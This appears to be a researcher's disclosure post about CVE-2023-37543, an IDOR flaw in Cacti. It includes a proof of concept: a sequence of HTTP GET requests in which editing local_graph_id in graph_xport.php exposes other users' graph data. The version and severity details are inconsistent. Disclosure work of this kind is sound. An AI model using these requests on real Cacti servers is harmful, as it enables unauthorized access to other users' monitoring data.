🔒 Exciting News! My First CVE Discovery: CVE-2023–37543 - IDOR Vulnerability in Cacti 🔒
I’m thrilled to share that I’ve just discovered my first Common Vulnerabilities and Exposures (CVE) in Cacti, a well-known network monitoring tool widely used by ISPs to monitor system performance, uptime, bandwidth usage, and much more.
• the name of an affected Product: CACTI
• the affected versions: < 1.2.6 fixed version(s): 1.2.25 (maybe some more versions between them)
• the CVE ID: CVE-2023–37543
• Vulnerability Type: IDOR
• Impact: When I sign in with user X I can get data related to user Y
•CVSS:3.1: Moderate 7.5/ 10
The IDOR Vulnerability:
Through extensive testing and analysis, I identified an IDOR vulnerability within Cacti. This type of vulnerability occurs when an application fails to properly validate user access privileges to specific resources or objects. In the case of Cacti, the flaw enables an attacker to access sensitive information or perform unauthorized actions by manipulating object references (the type of the manipulation depends on his base authorization on his data)
POC:
let’s say that user X can fetch graphID (1,2,3) and user Y can fetch graphID (5,6,7) , when logged in as user X when fetching the graphs 3 requests are sent
GET /graph_json.php?local_graph_id=1&graph_height=150&graph_start=1685948030&graph_end=1687157630&rra_id=6&graph_width=500&disable_cache=true
2.
GET /graph.php?action=update_timespan&date1=2023–06–18%2004:11:50&date2=2023–06–19%2001:11:05 HTTP/1.1
3.
GET /graph_xport.php?local_graph_id=1&rra_id=0&format=table&graph_start=1687061510&graph_end=1687137065
by sending requests 1 and 2 then editing the local_graph_id in the third request, user X will be able to fetch the data of any local_graph_id related to any user
original request :
edited request:
Recommendations and Mitigation:
I strongly advise all Cacti users to update to the Latest Version: Ensure that you are using the most recent version of Cacti, as the developers regularly release patches and security updates to address vulnerabilities.
If you have any questions or would like to discuss this vulnerability further, feel free to reach out.
#CVE #Cybersecurity #IDOR #Cacti #Vulnerability #NetworkMonitoring